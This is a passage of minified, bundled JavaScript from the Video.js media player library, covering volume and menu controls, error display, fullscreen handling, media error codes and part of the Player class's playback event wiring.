TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-time-control vjs-time-divider",innerHTML:"<div><span>/</span></div>"})},b}(h["default"]);h["default"].registerComponent("TimeDivider",i),c["default"]=i,b.exports=c["default"]},{"../../component.js":52}],78:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../slider/slider.js"),h=d(g),i=a("../../component.js"),j=d(i),k=a("../../utils/fn.js"),l=d(k),m=a("../../utils/round-float.js"),n=d(m),o=a("./volume-level.js"),p=(d(o),function(a){function b(c,d){e(this,b),a.call(this,c,d),this.on(c,"volumechange",this.updateARIAAttributes),c.ready(l.bind(this,this.updateARIAAttributes))}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-volume-bar","aria-label":"volume level"})},b.prototype.handleMouseMove=function(a){this.player_.muted()&&this.player_.muted(!1),this.player_.volume(this.calculateDistance(a))},b.prototype.getPercent=function(){return this.player_.muted()?0:this.player_.volume()},b.prototype.stepForward=function(){this.player_.volume(this.player_.volume()+.1)},b.prototype.stepBack=function(){this.player_.volume(this.player_.volume()-.1)},b.prototype.updateARIAAttributes=function(){this.el_.setAttribute("aria-valuenow",n["default"](100*this.player_.volume(),2)),this.el_.setAttribute("aria-valuetext",n["default"](100*this.player_.volume(),2)+"%")},b}(h["default"]));p.prototype.options_={children:{volumeLevel:{}},barName:"volumeLevel"},p.prototype.playerEvent="volumechange",j["default"].registerComponent("VolumeBar",p),c["default"]=p,b.exports=c["default"]},{"../../component.js":52,"../../slider/slider.js":96,"../../utils/fn.js":113,"../../utils/round-float.js":118,"./volume-level.js":80}],79:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=a("./volume-bar.js"),j=(d(i),function(a){function b(c,d){e(this,b),a.call(this,c,d),c.tech&&c.tech.featuresVolumeControl===!1&&this.addClass("vjs-hidden"),this.on(c,"loadstart",function(){c.tech.featuresVolumeControl===!1?this.addClass("vjs-hidden"):this.removeClass("vjs-hidden")})}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-volume-control vjs-control"})},b}(h["default"]));j.prototype.options_={children:{volumeBar:{}}},h["default"].registerComponent("VolumeControl",j),c["default"]=j,b.exports=c["default"]},{"../../component.js":52,"./volume-bar.js":78}],80:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../../component.js"),h=d(g),i=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-volume-level",innerHTML:'<span class="vjs-control-text"></span>'})},b}(h["default"]);h["default"].registerComponent("VolumeLevel",i),c["default"]=i,b.exports=c["default"]},{"../../component.js":52}],81:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button.js"),h=(d(g),a("../component.js")),i=d(h),j=a("../menu/menu.js"),k=d(j),l=a("../menu/menu-button.js"),m=d(l),n=a("./mute-toggle.js"),o=d(n),p=a("./volume-control/volume-bar.js"),q=d(p),r=function(a){function b(c){var d=void 0===arguments[1]?{}:arguments[1];e(this,b),void 0===d.vertical&&(d.vertical=d.inline?!1:!0),d.volumeBar=d.volumeBar||{},d.volumeBar.vertical=!!d.vertical,a.call(this,c,d),this.on(c,"volumechange",this.volumeUpdate),c.tech&&c.tech.featuresVolumeControl===!1&&this.addClass("vjs-hidden"),this.on(c,"loadstart",function(){c.tech.featuresVolumeControl===!1?this.addClass("vjs-hidden"):this.removeClass("vjs-hidden")}),this.addClass("vjs-menu-button")}return f(b,a),b.prototype.buildCSSClass=function(){var b="";return b=this.options_.vertical?"vjs-volume-menu-button-vertical":"vjs-volume-menu-button-horizontal","vjs-volume-menu-button "+a.prototype.buildCSSClass.call(this)+" "+b},b.prototype.createMenu=function(){var a=new k["default"](this.player_,{contentElType:"div"}),b=new q["default"](this.player_,this.options_.volumeBar);return b.on("focus",function(){a.lockShowing()}),b.on("blur",function(){a.unlockShowing()}),a.addChild(b),a},b.prototype.handleClick=function(){o["default"].prototype.handleClick.call(this),a.prototype.handleClick.call(this)},b}(m["default"]);r.prototype.volumeUpdate=o["default"].prototype.update,r.prototype.controlText_="Mute",i["default"].registerComponent("VolumeMenuButton",r),c["default"]=r,b.exports=c["default"]},{"../button.js":51,"../component.js":52,"../menu/menu-button.js":89,"../menu/menu.js":91,"./mute-toggle.js":56,"./volume-control/volume-bar.js":78}],82:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./component"),h=d(g),i=a("./utils/dom.js"),j=d(i),k=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.update(),this.on(c,"error",this.update)}return f(b,a),b.prototype.createEl=function(){var b=a.prototype.createEl.call(this,"div",{className:"vjs-error-display"});return this.contentEl_=j.createEl("div"),b.appendChild(this.contentEl_),b},b.prototype.update=function(){this.player().error()&&(this.contentEl_.innerHTML=this.localize(this.player().error().message))},b}(h["default"]);h["default"].registerComponent("ErrorDisplay",k),c["default"]=k,b.exports=c["default"]},{"./component":52,"./utils/dom.js":111}],83:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./utils/events.js"),f=d(e),g=function(){};g.prototype.allowedEvents_={},g.prototype.on=function(a,b){var c=this.addEventListener;this.addEventListener=Function.prototype,f.on(this,a,b),this.addEventListener=c},g.prototype.addEventListener=g.prototype.on,g.prototype.off=function(a,b){f.off(this,a,b)},g.prototype.removeEventListener=g.prototype.off,g.prototype.one=function(a,b){f.one(this,a,b)},g.prototype.trigger=function(a){var b=a.type||a;"string"==typeof a&&(a={type:b}),a=f.fixEvent(a),this.allowedEvents_[b]&&this["on"+b]&&this["on"+b](a),f.trigger(this,a)},g.prototype.dispatchEvent=g.prototype.trigger,c["default"]=g,b.exports=c["default"]},{"./utils/events.js":112}],84:[function(a,b,c){"use strict";c.__esModule=!0;var d=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.super_=b)},e=function(a){var b=void 0===arguments[1]?{}:arguments[1],c=function(){a.apply(this,arguments)},e={};"object"==typeof b?(b.constructor!==Object.prototype.constructor&&(c=b.constructor),e=b):"function"==typeof b&&(c=b),d(c,a);for(var f in e)e.hasOwnProperty(f)&&(c.prototype[f]=e[f]);return c};c["default"]=e,b.exports=c["default"]},{}],85:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;for(var e=a("global/document"),f=d(e),g={},h=[["requestFullscreen","exitFullscreen","fullscreenElement","fullscreenEnabled","fullscreenchange","fullscreenerror"],["webkitRequestFullscreen","webkitExitFullscreen","webkitFullscreenElement","webkitFullscreenEnabled","webkitfullscreenchange","webkitfullscreenerror"],["webkitRequestFullScreen","webkitCancelFullScreen","webkitCurrentFullScreenElement","webkitCancelFullScreen","webkitfullscreenchange","webkitfullscreenerror"],["mozRequestFullScreen","mozCancelFullScreen","mozFullScreenElement","mozFullScreenEnabled","mozfullscreenchange","mozfullscreenerror"],["msRequestFullscreen","msExitFullscreen","msFullscreenElement","msFullscreenEnabled","MSFullscreenChange","MSFullscreenError"]],i=h[0],j=void 0,k=0;k<h.length;k++)if(h[k][1]in f["default"]){j=h[k];break}if(j)for(var k=0;k<j.length;k++)g[i[k]]=j[k];c["default"]=g,b.exports=c["default"]},{"global/document":1}],86:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("global/document"),f=d(e),g=a("global/window"),h=d(g),i=h["default"].navigator;c["default"]={techOrder:["html5","flash"],html5:{},flash:{},defaultVolume:0,inactivityTimeout:2e3,playbackRates:[],children:{mediaLoader:{},posterImage:{},textTrackDisplay:{},loadingSpinner:{},bigPlayButton:{},controlBar:{},errorDisplay:{},textTrackSettings:{}},language:f["default"].getElementsByTagName("html")[0].getAttribute("lang")||i.languages&&i.languages[0]||i.userLanguage||i.language||"en",languages:{},notSupportedMessage:"No compatible source was found for this video."},b.exports=c["default"]},{"global/document":1,"global/window":2}],87:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./component"),h=d(g),i=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-loading-spinner"})},b}(h["default"]);h["default"].registerComponent("LoadingSpinner",i),c["default"]=i,b.exports=c["default"]},{"./component":52}],88:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("object.assign"),f=d(e),g=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){"number"==typeof a?this.code=a:"string"==typeof a?this.message=a:"object"==typeof a&&f["default"](this,a),this.message||(this.message=g.defaultMessages[this.code]||"")});g.prototype.code=0,g.prototype.message="",g.prototype.status=null,g.errorTypes=["MEDIA_ERR_CUSTOM","MEDIA_ERR_ABORTED","MEDIA_ERR_NETWORK","MEDIA_ERR_DECODE","MEDIA_ERR_SRC_NOT_SUPPORTED","MEDIA_ERR_ENCRYPTED"],g.defaultMessages={1:"You aborted the video playback",2:"A network error caused the video download to fail part-way.",3:"The video playback was aborted due to a corruption problem or because the video used features your browser did not support.",4:"The video could not be loaded, either because the server or network failed or because the format is not supported.",5:"The video is encrypted and we do not have the keys to decrypt it."};for(var h=0;h<g.errorTypes.length;h++)g[g.errorTypes[h]]=h,g.prototype[g.errorTypes[h]]=h;c["default"]=g,b.exports=c["default"]},{"object.assign":44}],89:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button.js"),h=d(g),i=a("../component.js"),j=d(i),k=a("./menu.js"),l=d(k),m=a("../utils/dom.js"),n=d(m),o=a("../utils/fn.js"),p=d(o),q=a("../utils/to-title-case.js"),r=d(q),s=function(a){function b(c){var d=void 0===arguments[1]?{}:arguments[1];e(this,b),a.call(this,c,d),this.update(),this.on("keydown",this.handleKeyPress),this.el_.setAttribute("aria-haspopup",!0),this.el_.setAttribute("role","button")}return f(b,a),b.prototype.update=function(){var a=this.createMenu();this.menu&&this.removeChild(this.menu),this.menu=a,this.addChild(a),this.buttonPressed_=!1,this.items&&0===this.items.length?this.hide():this.items&&this.items.length>1&&this.show()},b.prototype.createMenu=function(){var a=new l["default"](this.player_);if(this.options_.title&&a.contentEl().appendChild(n.createEl("li",{className:"vjs-menu-title",innerHTML:r["default"](this.options_.title),tabIndex:-1})),this.items=this.createItems(),this.items)for(var b=0;b<this.items.length;b++)a.addItem(this.items[b]);return a},b.prototype.createItems=function(){},b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:this.buildCSSClass()})},b.prototype.buildCSSClass=function(){var b="vjs-menu-button";return b+=this.options_.inline===!0?"-inline":"-popup","vjs-menu-button "+b+" "+a.prototype.buildCSSClass.call(this)},b.prototype.handleFocus=function(){},b.prototype.handleBlur=function(){},b.prototype.handleClick=function(){this.one("mouseout",p.bind(this,function(){this.menu.unlockShowing(),this.el_.blur()})),this.buttonPressed_?this.unpressButton():this.pressButton()},b.prototype.handleKeyPress=function(a){32===a.which||13===a.which?(this.buttonPressed_?this.unpressButton():this.pressButton(),a.preventDefault()):27===a.which&&(this.buttonPressed_&&this.unpressButton(),a.preventDefault())},b.prototype.pressButton=function(){this.buttonPressed_=!0,this.menu.lockShowing(),this.el_.setAttribute("aria-pressed",!0),this.items&&this.items.length>0&&this.items[0].el().focus()},b.prototype.unpressButton=function(){this.buttonPressed_=!1,this.menu.unlockShowing(),this.el_.setAttribute("aria-pressed",!1)},b}(h["default"]);j["default"].registerComponent("MenuButton",s),c["default"]=s,b.exports=c["default"]},{"../button.js":51,"../component.js":52,"../utils/dom.js":111,"../utils/fn.js":113,"../utils/to-title-case.js":120,"./menu.js":91}],90:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../button.js"),h=d(g),i=a("../component.js"),j=d(i),k=a("object.assign"),l=d(k),m=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.selected(d.selected)}return f(b,a),b.prototype.createEl=function(b,c){return a.prototype.createEl.call(this,"li",l["default"]({className:"vjs-menu-item",innerHTML:this.localize(this.options_.label)},c))},b.prototype.handleClick=function(){this.selected(!0)},b.prototype.selected=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){a?(this.addClass("vjs-selected"),this.el_.setAttribute("aria-selected",!0)):(this.removeClass("vjs-selected"),this.el_.setAttribute("aria-selected",!1))}),b}(h["default"]);j["default"].registerComponent("MenuItem",m),c["default"]=m,b.exports=c["default"]},{"../button.js":51,"../component.js":52,"object.assign":44}],91:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component.js"),h=d(g),i=a("../utils/dom.js"),j=d(i),k=a("../utils/fn.js"),l=d(k),m=a("../utils/events.js"),n=d(m),o=function(a){function b(){e(this,b),null!=a&&a.apply(this,arguments)}return f(b,a),b.prototype.addItem=function(a){this.addChild(a),a.on("click",l.bind(this,function(){this.unlockShowing()}))},b.prototype.createEl=function(){var b=this.options_.contentElType||"ul";this.contentEl_=j.createEl(b,{className:"vjs-menu-content"});var c=a.prototype.createEl.call(this,"div",{append:this.contentEl_,className:"vjs-menu"});return c.appendChild(this.contentEl_),n.on(c,"click",function(a){a.preventDefault(),a.stopImmediatePropagation()}),c},b}(h["default"]);h["default"].registerComponent("Menu",o),c["default"]=o,b.exports=c["default"]},{"../component.js":52,"../utils/dom.js":111,"../utils/events.js":112,"../utils/fn.js":113}],92:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./component.js"),h=d(g),i=a("global/document"),j=d(i),k=a("global/window"),l=(d(k),a("./utils/events.js")),m=d(l),n=a("./utils/dom.js"),o=d(n),p=a("./utils/fn.js"),q=d(p),r=a("./utils/guid.js"),s=d(r),t=a("./utils/browser.js"),u=(d(t),a("./utils/log.js")),v=d(u),w=a("./utils/to-title-case.js"),x=d(w),y=a("./utils/time-ranges.js"),z=a("./utils/buffer.js"),A=a("./fullscreen-api.js"),B=d(A),C=a("./media-error.js"),D=d(C),E=a("./global-options.js"),F=d(E),G=a("safe-json-parse/tuple"),H=d(G),I=a("object.assign"),J=d(I),K=a("./utils/merge-options.js"),L=d(K),M=a("./tech/loader.js"),N=(d(M),a("./poster-image.js")),O=(d(N),a("./tracks/text-track-display.js")),P=(d(O),a("./loading-spinner.js")),Q=(d(P),a("./big-play-button.js")),R=(d(Q),a("./control-bar/control-bar.js")),S=(d(R),a("./error-display.js")),T=(d(S),a("./tracks/text-track-settings.js")),U=(d(T),a("./tech/html5.js")),V=(d(U),function(a){function b(c,d,f){var g=this;if(e(this,b),c.id=c.id||"vjs_video_"+s.newGUID(),d=J["default"](b.getTagSettings(c),d),d.initChildren=!1,d.createEl=!1,d.reportTouchActivity=!1,a.call(this,null,d,f),!this.options_||!this.options_.techOrder||!this.options_.techOrder.length)throw new Error("No techOrder specified. Did you overwrite videojs.options instead of just changing the properties you want to override?");this.tag=c,this.tagAttributes=c&&o.getElAttributes(c),this.language(d.language||F["default"].language),d.languages?!function(){var a={};Object.getOwnPropertyNames(d.languages).forEach(function(b){a[b.toLowerCase()]=d.languages[b]}),g.languages_=a}():this.languages_=F["default"].languages,this.cache_={},this.poster_=d.poster||"",this.controls_=!!d.controls,c.controls=!1,this.scrubbing_=!1,this.el_=this.createEl();var h=L["default"]({},this.options_);d.plugins&&!function(){var a=d.plugins;Object.getOwnPropertyNames(a).forEach(function(b){a[b].playerOptions=h,"function"==typeof this[b]?this[b](a[b]):v["default"].error("Unable to find plugin:",b)},g)}(),this.options_.playerOptions=h,this.initChildren(),this.isAudio("audio"===c.nodeName.toLowerCase()),this.addClass(this.controls()?"vjs-controls-enabled":"vjs-controls-disabled"),this.isAudio()&&this.addClass("vjs-audio"),this.flexNotSupported_()&&this.addClass("vjs-no-flex"),b.players[this.id_]=this,this.userActive_=!0,this.reportUserActivity(),this.listenForUserActivity(),this.on("fullscreenchange",this.handleFullscreenChange),this.on("stageclick",this.handleStageClick)}return f(b,a),b.prototype.dispose=function(){this.trigger("dispose"),this.off("dispose"),b.players[this.id_]=null,this.tag&&this.tag.player&&(this.tag.player=null),this.el_&&this.el_.player&&(this.el_.player=null),this.tech&&this.tech.dispose(),a.prototype.dispose.call(this)},b.prototype.createEl=function(){var b=this.el_=a.prototype.createEl.call(this,"div"),c=this.tag;c.removeAttribute("width"),c.removeAttribute("height");var d=o.getElAttributes(c);return Object.getOwnPropertyNames(d).forEach(function(a){"class"===a?b.className=d[a]:b.setAttribute(a,d[a])}),c.id+="_html5_api",c.className="vjs-tech",c.player=b.player=this,this.addClass("vjs-paused"),this.styleEl_=j["default"].createElement("style"),b.appendChild(this.styleEl_),this.width(this.options_.width),this.height(this.options_.height),this.fluid(this.options_.fluid),this.aspectRatio(this.options_.aspectRatio),c.initNetworkState_=c.networkState,c.parentNode&&c.parentNode.insertBefore(b,c),o.insertElFirst(c,b),this.el_=b,b},b.prototype.width=function(a){return this.dimension("width",a)},b.prototype.height=function(a){return this.dimension("height",a)},b.prototype.dimension=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a,b){var c=a+"_";if(void 0===b)return this[c]||0;if(""===b)this[c]=void 0;else{var d=parseFloat(b);if(isNaN(d))return v["default"].error('Improper value "'+b+'" supplied for for '+a),this;this[c]=d}return this.updateStyleEl_(),this}),b.prototype.fluid=function(a){return void 0===a?!!this.fluid_:(this.fluid_=!!a,void(a?this.addClass("vjs-fluid"):this.removeClass("vjs-fluid")))},b.prototype.aspectRatio=function(a){if(void 0===a)return this.aspectRatio_;if(!/^\d+\:\d+$/.test(a))throw new Error("Improper value supplied for aspect ratio. The format should be width:height, for example 16:9.");this.aspectRatio_=a,this.fluid(!0),this.updateStyleEl_()},b.prototype.updateStyleEl_=function(){var a=void 0,b=void 0,c=void 0;c=void 0!==this.aspectRatio_&&"auto"!==this.aspectRatio_?this.aspectRatio_:this.videoWidth()?this.videoWidth()+":"+this.videoHeight():"16:9";var d=c.split(":"),e=d[1]/d[0];a=void 0!==this.width_?this.width_:void 0!==this.height_?this.height_/e:this.videoWidth()||300,b=void 0!==this.height_?this.height_:a*e;var f=this.id()+"-dimensions";this.addClass(f);var g="."+f+" { width: "+a+"px; height: "+b+"px; }";g+="."+f+".vjs-fluid { padding-top: "+100*e+"%; }",this.styleEl_.styleSheet?this.styleEl_.styleSheet.cssText=g:this.styleEl_.innerHTML=g},b.prototype.loadTech=function(a,b){this.tech&&this.unloadTech(),"Html5"!==a&&this.tag&&(h["default"].getComponent("Html5").disposeMediaElement(this.tag),this.tag.player=null,this.tag=null),this.techName=a,this.isReady_=!1;var c=q.bind(this,function(){this.triggerReady()}),d=J["default"]({source:b,playerId:this.id(),techId:""+this.id()+"_"+a+"_api",textTracks:this.textTracks_,autoplay:this.options_.autoplay,preload:this.options_.preload,loop:this.options_.loop,muted:this.options_.muted,poster:this.poster(),language:this.language()},this.options_[a.toLowerCase()]);this.tag&&(d.tag=this.tag),b&&(this.currentType_=b.type,b.src===this.cache_.src&&this.cache_.currentTime>0&&(d.startTime=this.cache_.currentTime),this.cache_.src=b.src);var e=h["default"].getComponent(a);this.tech=new e(d),this.on(this.tech,"ready",this.handleTechReady),this.on(this.tech,"usenativecontrols",this.handleTechUseNativeControls),this.on(this.tech,"loadstart",this.handleTechLoadStart),this.on(this.tech,"waiting",this.handleTechWaiting),this.on(this.tech,"canplay",this.handleTechCanPlay),this.on(this.tech,"canplaythrough",this.handleTechCanPlayThrough),this.on(this.tech,"playing",this.handleTechPlaying),this.on(this.tech,"ended",this.handleTechEnded),this.on(this.tech,"seeking",this.handleTechSeeking),this.on(this.tech,"seeked",this.handleTechSeeked),this.on(this.tech,"play",this.handleTechPlay),this.on(this.tech,"firstplay",this.handleTechFirstPlay),this.on(this.tech,"pause",this.handleTechPause),this.on(this.tech,"progress",this.handleTechProgress),this.on(this.tech,"durationchange",this.handleTechDurationChange),this.on(this.tech,"fullscreenchange",this.handleTechFullscreenChange),this.on(this.tech,"error",this.handleTechError),this.on(this.tech,"suspend",this.handleTechSuspend),this.on(this.tech,"abort",this.handleTechAbort),this.on(this.tech,"emptied",this.handleTechEmptied),this.on(this.tech,"stalled",this.handleTechStalled),this.on(this.tech,"loadedmetadata",this.handleTechLoadedMetaData),this.on(this.tech,"loadeddata",this.handleTechLoadedData),this.on(this.tech,"timeupdate",this.handleTechTimeUpdate),this.on(this.tech,"ratechange",this.handleTechRateChange),this.on(this.tech,"volumechange",this.handleTechVolumeChange),this.on(this.tech,"texttrackchange",this.onTextTrackChange),this.on(this.tech,"loadedmetadata",this.updateStyleEl_),this.controls()&&!this.usingNativeControls()&&this.addTechControlsListeners(),this.tech.el().parentNode===this.el()||"Html5"===a&&this.tag||o.insertElFirst(this.tech.el(),this.el()),this.tag&&(this.tag.player=null,this.tag=null),this.tech.ready(c)},b.prototype.unloadTech=function(){this.textTracks_=this.textTracks(),this.isReady_=!1,this.tech.dispose(),this.tech=!1},b.prototype.addTechControlsListeners=function(){this.on(this.tech,"mousedown",this.handleTechClick),this.on(this.tech,"touchstart",this.handleTechTouchStart),this.on(this.tech,"touchmove",this.handleTechTouchMove),this.on(this.tech,"touchend",this.handleTechTouchEnd),this.on(this.tech,"tap",this.handleTechTap)},b.prototype.removeTechControlsListeners=function(){this.off(this.tech,"tap",this.handleTechTap),this.off(this.tech,"touchstart",this.handleTechTouchStart),this.off(this.tech,"touchmove",this.handleTechTouchMove),this.off(this.tech,"touchend",this.handleTechTouchEnd),this.off(this.tech,"mousedown",this.handleTechClick)},b.prototype.handleTechReady=function(){this.triggerReady(),this.cache_.volume&&this.techCall("setVolume",this.cache_.volume),this.tag&&this.options_.autoplay&&this.paused()&&(delete this.tag.poster,this.play())},b.prototype.handleTechUseNativeControls=function(){this.usingNativeControls(!0)},b.prototype.handleTechLoadStart=function(){this.removeClass("vjs-ended"),this.error(null),this.paused()?(this.hasStarted(!1),this.trigger("loadstart")):(this.trigger("loadstart"),this.trigger("firstplay"))},b.prototype.hasStarted=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){return void 0!==a?(this.hasStarted_!==a&&(this.hasStarted_=a,a?(this.addClass("vjs-has-started"),this.trigger("firstplay")):this.removeClass("vjs-has-started")),this):!!this.hasStarted_}),b.prototype.handleTechPlay=function(){this.removeClass("vjs-ended"),this.removeClass("vjs-paused"),this.addClass("vjs-playing"),this.hasStarted(!0),this.trigger("play")},b.prototype.handleTechWaiting=function(){this.addClass("vjs-waiting"),this.trigger("waiting")},b.prototype.handleTechCanPlay=function(){this.removeClass("vjs-waiting"),this.trigger("canplay")},b.prototype.handleTechCanPlayThrough=function(){this.removeClass("vjs-waiting"),this.trigger("canplaythrough")},b.prototype.handleTechPlaying=function(){this.removeClass("vjs-waiting"),this.trigger("playing")},b.prototype.handleTechSeeking=function(){this.addClass("vjs-seeking"),this.trigger("seeking")},b.prototype.handleTechSeeked=function(){this.removeClass("vjs-seeking"),this.trigger("seeked")},b.prototype.handleTechFirstPlay=function(){this.options_.starttime&&this.currentTime(this.options_.starttime),this.addClass("vjs-has-started"),this.trigger("firstplay")},b.prototype.handleTechPause=function(){this.removeClass("vjs-playing"),this.addClass("vjs-paused"),this.trigger("pause")},b.prototype.handleTechProgress=function(){this.trigger("progress"),1===this.bufferedPercent()&&this.trigger("loadedalldata")},b.prototype.handleTechEnded=function(){this.addClass("vjs-ended"),this.options_.loop?(this.currentTime(0),this.play()):this.paused()||this.pause(),this.trigger("ended")},b.prototype.handleTechDurationChange=function(){this.updateDuration(),this.trigger("durationchange")},b.prototype.handleTechClick=function(a){0===a.button&&this.controls()&&(this.paused()?this.play():this.pause())},b.prototype.handleTechTap=function(){this.userActive(!this.userActive())},b.prototype.handleTechTouchStart=function(){this.userWasActive=this.userActive()},b.prototype.handleTechTouchMove=function(){this.userWasActive&&this.reportUserActivity()},b.prototype.handleTechTouchEnd=function(a){a.preventDefault()},b.prototype.updateDuration=function(){var a=this.techGet("duration");a&&(0>a&&(a=1/0),this.duration(a),a===1/0?this.addClass("vjs-live"):this.removeClass("vjs-live"));
},b.prototype.handleFullscreenChange=function(){this.isFullscreen()?this.addClass("vjs-fullscreen"):this.removeClass("vjs-fullscreen")},b.prototype.handleStageClick=function(){this.reportUserActivity()},b.prototype.handleTechFullscreenChange=function(a,b){b&&this.isFullscreen(b.isFullscreen),this.trigger("fullscreenchange")},b.prototype.handleTechError=function(){this.error(this.tech.error().code)},b.prototype.handleTechSuspend=function(){this.trigger("suspend")},b.prototype.handleTechAbort=function(){this.trigger("abort")},b.prototype.handleTechEmptied=function(){this.trigger("emptied")},b.prototype.handleTechStalled=function(){this.trigger("stalled")},b.prototype.handleTechLoadedMetaData=function(){this.trigger("loadedmetadata")},b.prototype.handleTechLoadedData=function(){this.trigger("loadeddata")},b.prototype.handleTechTimeUpdate=function(){this.trigger("timeupdate")},b.prototype.handleTechRateChange=function(){this.trigger("ratechange")},b.prototype.handleTechVolumeChange=function(){this.trigger("volumechange")},b.prototype.onTextTrackChange=function(){this.trigger("texttrackchange")},b.prototype.getCache=function(){return this.cache_},b.prototype.techCall=function(a,b){if(this.tech&&!this.tech.isReady_)this.tech.ready(function(){this[a](b)});else try{this.tech[a](b)}catch(c){throw v["default"](c),c}},b.prototype.techGet=function(a){if(this.tech&&this.tech.isReady_)try{return this.tech[a]()}catch(b){throw void 0===this.tech[a]?v["default"]("Video.js: "+a+" method not defined for "+this.techName+" playback 